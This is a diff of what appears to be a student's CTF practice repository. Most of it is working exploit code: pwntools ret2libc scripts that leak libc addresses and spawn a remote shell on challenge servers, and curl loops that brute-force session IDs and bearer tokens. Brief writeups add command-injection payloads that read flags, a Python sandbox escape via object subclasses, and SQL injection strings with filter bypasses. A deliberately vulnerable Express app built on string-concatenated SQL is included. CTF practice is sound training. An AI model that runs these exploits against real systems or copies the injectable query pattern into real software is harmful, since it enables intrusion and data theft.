+p $sp
+p x/10x $sp
+x/10x $sp
+x/20x $sp
+disass main
+disass vuln
+disass setup
+disass vuln
+r
+r
+c
+r
+c
+r
+c
+r
+c
+finish
+9$lx
+finish
+finish
+n
+r
+c
+xinfo 7ffff7e0a4a0
+xinfo 0x7ffff7e0a4a0
+stack
+x/10i 0x7ffff7e0a4a0
+r
+c
+r
+%9$lx
+c
+stack
+quit
+b vuln
+r
+%9$lx
+c
+r
+%20$lx.%21$lx.%22$lx.%23$lx.%24%lx
+c
+r
+c
+r
+
+r
+r
+r
+r
+r
+b vuln
+r
+stack
+disass main
+r
+c
+r
+
+r
+c
+r
+r
+c
+r
+c

ret2libc/03_feedback_portarl/find_ret.py

@@ -0,0 +1,2 @@
+for i in range(45,55):
+    print(f"%{i}$lx.", end="")

ret2libc/03_feedback_portarl/solve.py

@@ -0,0 +1,49 @@
+#!/usr/bin/env python3
+from pwn import *
+context.binary = elf = ELF('./feedback_portal', checksec=False)
+# Change if on server
+
+libc = ELF('libc.so.6', checksec=False)
+#libc = ELF('/usr/lib/libc.so.6', checksec=False)
+OFFSET_TO_RIP = 128 + 8
+RET = 0x40101a
+#libc_call = libc.sym['__libc_start_main']
+libc_call = 0x29d90
+# local libc
+#POP_RDI = 0x10269a
+# remote libc
+POP_RDI = 0x10f78b
+BINSH = next(libc.search(b'/bin/sh\x00'))
+
+#p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13595)
+
+p.recvuntil(b'Please enter your name:\n')
+# __libc_start_main (non funziona in remoto)
+#p.sendline(b"%47$lx")
+# __libc_start_call_main
+p.sendline(b"%25$lx")
+
+libc_start_main = p.recvline().split(b',')[1].strip()
+libc_start_main = b'0x' + libc_start_main
+libc_start_main = int(libc_start_main, 16)
+
+#libc_address = libc_start_main - libc_call - 128 - 8
+print(f"Libc start main dropped:{hex(libc_start_main)}")
+print(f"Libc start main from symbol:{hex(libc_call)}")
+print(f"BINSH:{hex(BINSH)}")
+libc_address = (libc_start_main - libc_call) & ~0xfff
+print(f"Addr: {hex(libc_address)}")
+libc.address = libc_address
+print(p.recvuntil(b'Now leave your feedback:\n'))
+payload = flat(
+        b'A' * OFFSET_TO_RIP,
+        p64(RET),
+        #elf.symbols["main"],
+        p64(libc_address + POP_RDI),
+        p64(libc_address + BINSH),
+        libc.symbols["system"]
+        )
+p.send(payload)
+#print(p.recvline())
+p.interactive()

ret2libc/04_crystal_ball/.gdb_history

@@ -0,0 +1,20 @@
+disass vuln
+disass main
+r
+disass main
+got
+python
+clear
+quit
+quit
+p rdx
+info registers
+quit
+disass vuln
+b *0x000000000040124e
+info regs
+info registers 
+c
+quit
+dquit
+quit

ret2libc/04_crystal_ball/solve.py

@@ -0,0 +1,59 @@
+from pwn import *
+
+RIP_OFF = 64 + 8
+context.binary = elf = ELF("./ret2libc_aslr", checksec=False)
+# context.gdbinit = "/usr/local/"
+# Change if on server
+libc = ELF("libc.so.6", checksec=False)
+# libc = ELF("/usr/lib/libc.so.6", checksec=False)
+POP_RDI = 0x4011FB
+RET = 0x40101A
+PUTS_PLT = elf.plt["puts"]
+PUTS_GOT = elf.got[
+    "gets"
+]  # my libc puts end with x00 so it's better to use anything else in the binary
+MAIN = elf.sym["main"]
+BINSH = next(libc.search(b"/bin/sh\x00"))
+context.terminal = ["tmux", "splitw", "-h"]
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13505)
+
+print(p.recvuntil(b"Tell me your wish:"))
+# p.recvuntil(b"The stars have spoken!\n")
+# pause()
+payload = flat(
+    b"A" * RIP_OFF, p64(RET), p64(POP_RDI), p64(PUTS_GOT), p64(PUTS_PLT), p64(MAIN)
+)
+# print("Sending payload...")
+# sendline for gets function
+p.sendline(payload)
+p.recvline()
+leaked = p.recvline().strip()
+leak_puts = u64(leaked.ljust(8, b"\x00"))
+log.info(f"puts leak = {leak_puts:#x}")
+libc.address = leak_puts - libc.symbols["gets"]
+log.info(f"libc base = {libc.address:#x}")
+print(p.recvline())
+print(p.recvline())
+print(p.recvuntil(b"Tell me your wish:"))
+# p.send(b"\n")
+# print(p.recv(1024))
+# print(p.recv(128))
+# print(p.recv(128))
+# print(p.recvline())
+# print(p.recvline())
+# print(p.recvuntil(b"Tell me your wish:"))
+
+payload = flat(
+    b"A" * RIP_OFF, p64(POP_RDI), p64(libc.address + BINSH), p64(libc.symbols["system"])
+)
+p.sendline(payload)
+print(p.recvline())
+p.interactive()
+# print(p.recv(1024))
+# print(p.recv(1024))
+
+# p.recvuntil(b"Tell me your wish:")
+# p.interactive()
+# p = remote("offsec.m0lecon.it", 13507)

ret2libc/05_digital_postcard_writer/.gdb_history

@@ -0,0 +1,7 @@
+r
+quit
+disass vuln
+b *0x0000000000401258
+r
+got
+quit

ret2libc/05_digital_postcard_writer/main.c

@@ -0,0 +1,5 @@
+#include <stdio.h>
+int main(){
+    printf(0x334455);
+    return 0;
+}

ret2libc/05_digital_postcard_writer/solve.py

@@ -0,0 +1,49 @@
+from pwn import *
+
+context.binary = elf = ELF("./ret2libc_home", checksec=False)
+# Change if on server
+libc = ELF("libc.so.6", checksec=False)
+# libc = ELF("/usr/lib/libc.so.6", checksec=False)
+POP_RDI = 0x4011FB
+RIP_OFF = 128 + 8
+# I can still use puts instead of printf since puts is used inside the main
+PRINTF_PLT = elf.plt["printf"]
+PUTS_PLT = elf.plt["puts"]
+PRINTF_GOT = elf.got[
+    "puts"
+]  # In local I can use printf, instead on remote I switch to puts (printf end with \x00
+MAIN = elf.symbols["main"]
+
+BINSH = next(libc.search(b"/bin/sh\x00"))
+RET = 0x40101A
+# STR = next(elf.search(b"Write your message:\n\x00"))
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13597)
+print(p.recvuntil(b"Write your message:\n"))
+payload = flat(
+    b"A" * RIP_OFF,
+    p64(RET),
+    p64(POP_RDI),
+    # p64(STR),
+    p64(PRINTF_GOT),
+    p64(PUTS_PLT),
+    # p64(PRINTF_PLT),
+    p64(MAIN),
+)
+p.send(payload)
+print(p.recvline())
+# print(p.recvline())
+leaked = p.recvline().strip()
+leak_puts = u64(leaked.ljust(8, b"\x00"))
+log.info(f"puts leak = {leak_puts:#x}")
+libc.address = leak_puts - libc.symbols["puts"]
+log.info(f"libc base = {libc.address:#x}")
+
+
+print(p.recvuntil(b"Write your message:\n"))
+
+payload = flat(
+    b"A" * RIP_OFF, p64(POP_RDI), p64(libc.address + BINSH), p64(libc.symbols["system"])
+)
+p.send(payload)
+p.interactive()

web-auth/flagmail/force.py

@@ -0,0 +1,14 @@
+import os
+import time
+
+token = 1775846743002
+payload = f"curl --path-as-is -i -s -k -X $'GET' \
+    -H $'Host: 4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001' -H $'Accept-Language: en-US,en;q=0.9' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36' -H $'Authorization: Bearer 1775846743002' -H $'Accept: */*' -H $'Referer: http://4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001/inbox' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \
+    $'http://4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001/api/inbox'"
+# os.system(f"{payload} | grep 'messages'")
+for i in range(60 * 999):
+    num = 1775844960000 + i
+    payload = f"curl --path-as-is -i -s -k -X $'GET' \
+    -H $'Host: 4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001' -H $'Accept-Language: en-US,en;q=0.9' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36' -H $'Authorization: Bearer {num}' -H $'Accept: */*' -H $'Referer: http://4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001/inbox' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \
+    $'http://4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001/api/inbox'"
+    os.system(f"echo 'Date: \n{num}\n' && {payload}")

web-auth/keyvault/convert.py

@@ -0,0 +1,16 @@
+import base64
+
+# Example Base64 encoded N value
+b64_n = "33dSdlKWda7L8qG94uQHfd21KnwjnbyCyMj44gTS5olb7Aejqsu8fB2lzNJhpWf6bDpFQ3iAWIXjuDQLPHGnQqHasDPEcJdlcQOJn6Sqgj2PnbuE2bBASXEefzjssDJyiZdqMWGRp41E_TlqUcoShkMjf95N_4KlvjsOTb9I99iAA3ouTWcfHA4N7Ln3fzL-BNYlVtbxTCCT-u4kyC0HewrNltZVNiJPV-FxH9FVKvqZQIv-ZCM6EgnXnU9broBZEENIEK02yYvyjqxwPnku96J4MdDItY9qyiNTzSNkHyNK0ds-kagMLT2EP7mR2EAryCv0ZDgJKQlIw4xYH91MKQ"
+
+# 1. Decode the string
+# If it's standard Base64:
+# n_bytes = base64.urlsafe_b64decode(b64_n)
+
+# If it's Base64URL (common in JWKs):
+n_bytes = base64.urlsafe_b64decode(b64_n + "==")
+
+# 2. Convert bytes to integer (Big-Endian)
+n_integer = int.from_bytes(n_bytes, byteorder="big")
+
+print(f"Integer Value: {n_integer}")

web-auth/neonarcade/writeup

@@ -0,0 +1,2 @@
+- Aggiornando da settings posso fare delle POST generando qualsiasi token voglio (firmato dal server)
+- Faccio una post con role=admin invece che role=player e dopo lo mando a /operator trovando la flag.

web-auth/too_small/cookie-output.txt

@@ -0,0 +1,6 @@
+# Netscape HTTP Cookie File
+# https://curl.se/docs/http-cookies.html
+# This file was generated by libcurl! Edit at your own risk.
+
+too-small-reminder.challs.olicyber.it	FALSE	/	FALSE	0	session_id	1337
+

web-auth/too_small/force.sh

@@ -0,0 +1,8 @@
+#!/bin/bash
+
+for i in $(seq 1 9999);
+do
+	echo "Session id=$i"
+	curl -b "session_id=$i"  http://too-small-reminder.challs.olicyber.it/admin
+
+done

web-cmdi/01_gitpeek/writeup.txt

@@ -0,0 +1,6 @@
+Some chars are banned.
+Still can inject command with $().
+INPUT: main $(echo "$FLAG")
+OUTPUT: fatal: ambiguous argument 'offsec{g1t_p33k_cmd_sub_8Skb0N4P7k3hgSpr}': unknown revision or path not in the working tree.
+Use '--' to separate paths from revisions, like this:
+'git <command> [<revision>...] -- [<file>...]'

web-cmdi/02_qrdrop/writeup.txt

@@ -0,0 +1,3 @@
+using ' We can escape the command and inject bash code.
+INPUT: prova'$(cat /flag.txt)'
+OUTPUT (from the decoded qr): provaoffsec{qr_dr0p_qu0t3_br34k_booPPFJAAhS0QtOb}

web-cmdi/03_spreadsheet/writeup.txt

@@ -0,0 +1,10 @@
+INPUT: ="PROVA"+os.system('ls')
+OUTPUT: can only concatenate str (not "int) with str
+
+Therefore we can execute python from website. But os.system return an integer
+instead of the output of command.
+
+From stackoverflow: os.popen("command").read() return the output of command:
+
+INPUT: ="PROVA"+os.popen('echo $FLAG').read()
+OUTPUT: "PROVA"+flag 

web-cmdi/04_autograding/test.py

@@ -0,0 +1 @@
+print("echo 'aaaa'")

web-cmdi/04_autograding/writeup.txt

@@ -0,0 +1,28 @@
+Python sandbox blocks import etc.
+
+From here: https://github.com/jailctf/pyjailbreaker
+https://github.com/yaklang/hack-skills/blob/main/skills/sandbox-escape-techniques/PYTHON_SANDBOX_ESCAPE.md
+Commands like this one can get the os module and execute system:
+[cls for cls in object.__subclasses__() if 'os._wrap_close' in str(cls)][0].__init__.__globals__['sys'].modules['os'].system('sh')
+
+The sandbox still bans keyword like system. So
+def fibonacci(n):
+    # Your implementation here
+    os_mod = [cls for cls in object.__subclasses__() if 'os._wrap_close' in str(cls)][0].__init__.__globals__['sys'].modules['os']
+    print(os_mod.getenv('FLAG'))
+
+I tryed and found out that the FLAG is also set as environment variable and so I got it usig os.getenv('FLAG')
+
+WORK IN PROGRESS
+def fibonacci(n):
+    # Your implementation here
+    #for i, cls in enumerate(''.__class__.__bases__[0].__subclasses__()):
+    #    if 'codecs.In' in str(cls):
+    #        print(i, cls)
+    #        break
+    INDEX=127
+    dictglobals = ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__
+    print(dictglobals.keys())
+    op_en =  ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__['open']
+#('/flag.txt','r')
+    #re_ad = ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__['read']

web-cmdi/05_virusvault/test1.txt

@@ -0,0 +1 @@
+'a'; $(echo "$FLAG");

web-logic/01_swagshop/solution.txt

@@ -0,0 +1 @@
+Make remove request in the cart, you get negative checkout and earn credit.

web-logic/02_mission_control/sol.txt

@@ -0,0 +1 @@
+With burpsuite modified the role in the header request.

web-logic/03_al_dente/sol.txt

@@ -0,0 +1 @@
+PUT request to update the profile. Added the field "role":"head_chef".

web-logic/04_ticket_vault/sol.txt

@@ -0,0 +1 @@
+GET qualcosa/ticket/1 SHOW the confidential ticket.

web-logic/05_lab_results/sol.txt

@@ -0,0 +1 @@
+GET qualcosa/report/number, change number get confidential medical report

web-sqli/01_airline_lost_found/writeup

@@ -0,0 +1,4 @@
+The original query are two nested subqueries so to escape we need to close two parenthesis. After that I can union a select.
+
+Final Query:
+Prova') OR 1=1 AND sqlite_version()=sqlite_version()) UNION SELECT 1,locker_code,3,4,5,6,7,8 FROM restricted_items --

web-sqli/02_department_wiki/app.js

@@ -0,0 +1,175 @@
+const express = require('express');
+const path = require('path');
+const Database = require('better-sqlite3');
+
+const app = express();
+const PORT = process.env.PORT || 3000;
+const FLAG = process.env.FLAG || 'offsec{test_flag}';
+const DB_PATH = process.env.DB_PATH || ':memory:';
+
+const db = new Database(DB_PATH);
+db.pragma('journal_mode = WAL');
+
+db.exec(`
+  CREATE TABLE IF NOT EXISTS departments (
+    id    INTEGER PRIMARY KEY AUTOINCREMENT,
+    name  TEXT NOT NULL,
+    icon  TEXT NOT NULL DEFAULT ''
+  );
+
+  CREATE TABLE IF NOT EXISTS articles (
+    id            INTEGER PRIMARY KEY AUTOINCREMENT,
+    department_id INTEGER NOT NULL,
+    title         TEXT NOT NULL,
+    slug          TEXT UNIQUE NOT NULL,
+    content       TEXT NOT NULL,
+    author        TEXT NOT NULL,
+    updated_at    TEXT NOT NULL DEFAULT (datetime('now')),
+    FOREIGN KEY (department_id) REFERENCES departments(id)
+  );
+
+  CREATE TABLE IF NOT EXISTS revision_log (
+    id         INTEGER PRIMARY KEY AUTOINCREMENT,
+    article_id INTEGER NOT NULL,
+    edited_by  TEXT NOT NULL,
+    summary    TEXT NOT NULL,
+    logged_at  TEXT NOT NULL DEFAULT (datetime('now')),
+    FOREIGN KEY (article_id) REFERENCES articles(id)
+  );
+
+  CREATE TABLE IF NOT EXISTS internal_config (
+    id    INTEGER PRIMARY KEY AUTOINCREMENT,
+    key   TEXT UNIQUE NOT NULL,
+    value TEXT NOT NULL
+  );
+`);
+
+const configCount = db.prepare('SELECT COUNT(*) as c FROM internal_config').get().c;
+if (configCount === 0) {
+  const insConfig = db.prepare('INSERT INTO internal_config (key, value) VALUES (?, ?)');
+  insConfig.run('site_name', 'Department Wiki');
+  insConfig.run('maintenance_mode', 'false');
+  insConfig.run('admin_token', FLAG);
+  insConfig.run('max_upload_size', '10485760');
+  insConfig.run('analytics_id', 'UA-XXXXXXXX-1');
+}
+
+const deptCount = db.prepare('SELECT COUNT(*) as c FROM departments').get().c;
+if (deptCount === 0) {
+  const departments = [
+    { name: 'Computer Science', icon: '\u{1F4BB}' },
+    { name: 'Mathematics',      icon: '\u{1F4D0}' },
+    { name: 'Physics',          icon: '\u{269B}' },
+    { name: 'Electronics',      icon: '\u{1F50C}' },
+    { name: 'Civil Engineering', icon: '\u{1F3D7}' },
+  ];
+
+  const insDept = db.prepare('INSERT INTO departments (name, icon) VALUES (?, ?)');
+  for (const d of departments) insDept.run(d.name, d.icon);
+
+  const articles = [
+    { dept: 1, title: 'Introduction to Algorithms', slug: 'intro-algorithms', content: 'This article covers the fundamentals of algorithm design and analysis. Topics include asymptotic notation, divide-and-conquer strategies, dynamic programming, and graph algorithms.\n\nStudents should be familiar with basic data structures before proceeding. The department recommends completing the Data Structures prerequisite course first.\n\nKey concepts: Big-O notation, recurrence relations, greedy algorithms, NP-completeness.', author: 'Prof. Rossi' },
+    { dept: 1, title: 'Operating Systems Overview', slug: 'os-overview', content: 'Modern operating systems manage hardware resources and provide services to applications. This article discusses process scheduling, memory management, file systems, and I/O handling.\n\nThe Linux kernel serves as our primary case study. Lab exercises use a custom kernel module to demonstrate scheduling policies.\n\nPrerequisites: Computer Architecture, C Programming.', author: 'Prof. Bianchi' },
+    { dept: 1, title: 'Database Systems', slug: 'database-systems', content: 'Relational database management systems form the backbone of most enterprise applications. This article covers the relational model, SQL, normalization theory, transaction processing, and query optimization.\n\nLab work uses PostgreSQL. Students will design and implement a complete database for a real-world scenario.\n\nTopics: ER diagrams, functional dependencies, ACID properties, indexing strategies.', author: 'Prof. Rossi' },
+    { dept: 1, title: 'Computer Networks', slug: 'computer-networks', content: 'This article provides a comprehensive overview of computer networking from the physical layer to the application layer. We follow the TCP/IP model and examine protocols at each layer.\n\nLab sessions involve packet capture with Wireshark and socket programming in Python.\n\nTopics: Ethernet, IP addressing, TCP/UDP, DNS, HTTP, network security basics.', author: 'Prof. Esposito' },
+    { dept: 2, title: 'Linear Algebra Essentials', slug: 'linear-algebra', content: 'Linear algebra is the study of vector spaces and linear mappings between them. This article covers vector spaces, matrices, determinants, eigenvalues, and diagonalization.\n\nApplications in computer graphics, machine learning, and signal processing are discussed. Weekly problem sets are mandatory.\n\nKey topics: Gaussian elimination, orthogonality, SVD, least squares.', author: 'Prof. Conti' },
+    { dept: 2, title: 'Calculus II: Integration', slug: 'calculus-integration', content: 'Building on Calculus I, this article explores techniques of integration, improper integrals, sequences and series, and an introduction to multivariable calculus.\n\nStudents should have a solid grasp of differentiation and limits. Office hours are available Tuesdays and Thursdays.\n\nTopics: Integration by parts, Taylor series, convergence tests, partial derivatives.', author: 'Prof. Ferrara' },
+    { dept: 3, title: 'Classical Mechanics', slug: 'classical-mechanics', content: 'This article covers Newtonian mechanics, Lagrangian and Hamiltonian formulations, oscillations, and rigid body dynamics.\n\nLab experiments include pendulum analysis, collision dynamics, and rotational motion measurements.\n\nPrerequisites: Calculus I, Linear Algebra. Textbook: Goldstein, Classical Mechanics.', author: 'Prof. Verdi' },
+    { dept: 3, title: 'Electromagnetism', slug: 'electromagnetism', content: 'Maxwell\'s equations unify electricity and magnetism into a single framework. This article covers electrostatics, magnetostatics, electromagnetic waves, and optics.\n\nLab work involves building simple circuits, measuring magnetic fields, and observing diffraction patterns.\n\nTopics: Gauss\'s law, Faraday\'s law, wave propagation, polarization.', author: 'Prof. Verdi' },
+    { dept: 4, title: 'Digital Electronics', slug: 'digital-electronics', content: 'Digital electronics is the foundation of modern computing hardware. This article covers Boolean algebra, logic gates, combinational and sequential circuits, and an introduction to FPGA design.\n\nLab exercises use Verilog HDL and Xilinx development boards. Students will implement a simple processor by the end of the course.\n\nTopics: Karnaugh maps, flip-flops, counters, state machines, FPGA synthesis.', author: 'Prof. Moretti' },
+    { dept: 4, title: 'Signal Processing', slug: 'signal-processing', content: 'Signal processing transforms and analyzes signals in both time and frequency domains. This article covers Fourier analysis, filtering, sampling theory, and digital signal processing.\n\nMATLAB is used extensively in lab sessions. Real-world applications include audio processing and communications.\n\nTopics: DFT, FFT, FIR/IIR filters, z-transform, spectral analysis.', author: 'Prof. Gallo' },
+    { dept: 5, title: 'Structural Analysis', slug: 'structural-analysis', content: 'Structural analysis determines the effects of loads on physical structures. This article covers equilibrium, trusses, beams, frames, and influence lines.\n\nSoftware tools like SAP2000 are introduced for computational analysis. Field visits to construction sites supplement the coursework.\n\nTopics: Method of joints, moment distribution, virtual work, matrix methods.', author: 'Prof. Romano' },
+    { dept: 5, title: 'Geotechnical Engineering', slug: 'geotechnical-engineering', content: 'Geotechnical engineering deals with soil and rock mechanics. This article covers soil classification, permeability, consolidation, shear strength, and foundation design.\n\nLab work includes triaxial testing, direct shear tests, and site investigation planning.\n\nTopics: Mohr-Coulomb criterion, bearing capacity, retaining walls, slope stability.', author: 'Prof. Romano' },
+  ];
+
+  const insArt = db.prepare('INSERT INTO articles (department_id, title, slug, content, author) VALUES (?, ?, ?, ?, ?)');
+  for (const a of articles) insArt.run(a.dept, a.title, a.slug, a.content, a.author);
+
+  const revisions = [
+    { article_id: 1, edited_by: 'Prof. Rossi',    summary: 'Added section on amortized analysis' },
+    { article_id: 1, edited_by: 'T.A. Marchetti',  summary: 'Fixed typo in complexity table' },
+    { article_id: 3, edited_by: 'Prof. Rossi',    summary: 'Updated lab instructions for PostgreSQL 16' },
+    { article_id: 5, edited_by: 'Prof. Conti',    summary: 'Added SVD application examples' },
+    { article_id: 7, edited_by: 'Prof. Verdi',    summary: 'Reformatted Lagrangian section' },
+    { article_id: 9, edited_by: 'Prof. Moretti',  summary: 'Added Verilog code samples' },
+    { article_id: 9, edited_by: 'T.A. Fontana',   summary: 'Corrected flip-flop timing diagrams' },
+    { article_id: 11, edited_by: 'Prof. Romano',  summary: 'Updated load factor tables to Eurocode' },
+  ];
+
+  const insRev = db.prepare('INSERT INTO revision_log (article_id, edited_by, summary) VALUES (?, ?, ?)');
+  for (const r of revisions) insRev.run(r.article_id, r.edited_by, r.summary);
+}
+
+app.set('view engine', 'ejs');
+app.set('views', path.join(__dirname, '..', 'views'));
+app.use(express.static(path.join(__dirname, '..', 'public')));
+app.use(express.urlencoded({ extended: false }));
+
+app.get('/', (req, res) => {
+  const departments = db.prepare(`
+    SELECT d.*, COUNT(a.id) as article_count
+    FROM departments d LEFT JOIN articles a ON d.id = a.department_id
+    GROUP BY d.id ORDER BY d.name
+  `).all();
+  const recent = db.prepare(`
+    SELECT a.slug, a.title, a.author, a.updated_at, d.name as dept_name, d.icon as dept_icon
+    FROM articles a JOIN departments d ON a.department_id = d.id
+    ORDER BY a.updated_at DESC LIMIT 5
+  `).all();
+  res.render('index', { departments, recent });
+});
+
+app.get('/department/:id', (req, res) => {
+  const dept = db.prepare('SELECT * FROM departments WHERE id = ?').get(req.params.id);
+  if (!dept) return res.status(404).render('404');
+  const articles = db.prepare(
+    'SELECT * FROM articles WHERE department_id = ? ORDER BY title'
+  ).all(dept.id);
+  res.render('department', { dept, articles });
+});
+
+app.get('/article/:slug', (req, res) => {
+  const article = db.prepare(
+    'SELECT a.*, d.name as dept_name, d.icon as dept_icon, d.id as dept_id FROM articles a JOIN departments d ON a.department_id = d.id WHERE a.slug = ?'
+  ).get(req.params.slug);
+  if (!article) return res.status(404).render('404');
+  const revisions = db.prepare(
+    'SELECT * FROM revision_log WHERE article_id = ? ORDER BY logged_at DESC'
+  ).all(article.id);
+  res.render('article', { article, revisions });
+});
+
+app.get('/search', (req, res) => {
+  const q = req.query.q || '';
+  if (!q.trim()) {
+    return res.render('search', { results: null, error: null, query: q });
+  }
+
+  try {
+    const sql = "SELECT a.slug, a.title, a.author, a.updated_at, d.name as dept_name, d.icon as dept_icon FROM articles a JOIN departments d ON a.department_id = d.id WHERE a.title LIKE '%" + q + "%' OR a.content LIKE '%" + q + "%' ORDER BY a.updated_at DESC";
+    db.exec(sql);
+    const results = db.prepare(
+      "SELECT a.slug, a.title, a.author, a.updated_at, d.name as dept_name, d.icon as dept_icon FROM articles a JOIN departments d ON a.department_id = d.id WHERE a.title LIKE ? OR a.content LIKE ? ORDER BY a.updated_at DESC"
+    ).all('%' + q + '%', '%' + q + '%');
+    res.render('search', { results, error: null, query: q });
+  } catch (err) {
+    res.render('search', { results: null, error: err.message, query: q });
+  }
+});
+
+app.get('/revisions', (req, res) => {
+  const revisions = db.prepare(`
+    SELECT r.*, a.title as article_title, a.slug as article_slug
+    FROM revision_log r JOIN articles a ON r.article_id = a.id
+    ORDER BY r.logged_at DESC LIMIT 20
+  `).all();
+  res.render('revisions', { revisions });
+});
+
+app.use((req, res) => {
+  res.status(404).render('404');
+});
+
+app.listen(PORT, () => {
+  console.log(`Department Wiki running on http://localhost:${PORT}`);
+});

web-sqli/02_department_wiki/writeup

@@ -0,0 +1,6 @@
+(From the source code) The server executes our query injection but shows the results of a safe query version.
+Therefore I need another way to show the output, INSERT works to create new article, I create the article with the output of
+the SELECT I made.
+
+a'; INSERT INTO articles (department_id, title,slug,content,author)
+VALUES(1,sqlite_version(),'SLUG6',(SELECT GROUP_CONCAT(value) FROM internal_config),'e') --

web-sqli/03_book_brew/writeup

@@ -0,0 +1,4 @@
+The registration form is safe, however the MyReviews page not, therefore we create a username with an embedded sql injection,
+this sql injection will be executed opening the MyReviews page.
+
+prova' UNION  SELECT 1,2,3,4,flag,6,7,8 FROM secrets--

web-sqli/04_stage_pass/writeup

@@ -0,0 +1,12 @@
+We can't use spaces nor sql keyword, instead of spaces I use /**/ (also -- could work) and the same keyword
+with different capital letters (Select, SeLeCt selecT etc are all working).
+
+Find the table name:
+1001/**/Union/**/Select/**/1,2,3,4,5,6,7,8,9,10,11,tbl_name/**/From/**/sqlite_master/**/Where/**/type='table'--
+
+Find the column:
+1001/**/Union/**/Select/**/1,2,3,4,5,6,7,8,9,10,11,sql/**/From/**/sqlite_master/**/
+Where/**/type!='meta'/**/And//sql/**/Not/**/NULL/**/And/**/name='vip_guestlist'
+
+Find the flag:
+1001/**/Union/**/Select/**/1,2,3,4,5,6,7,8,9,10,11,access_note/**/From/**/vip_guestlist--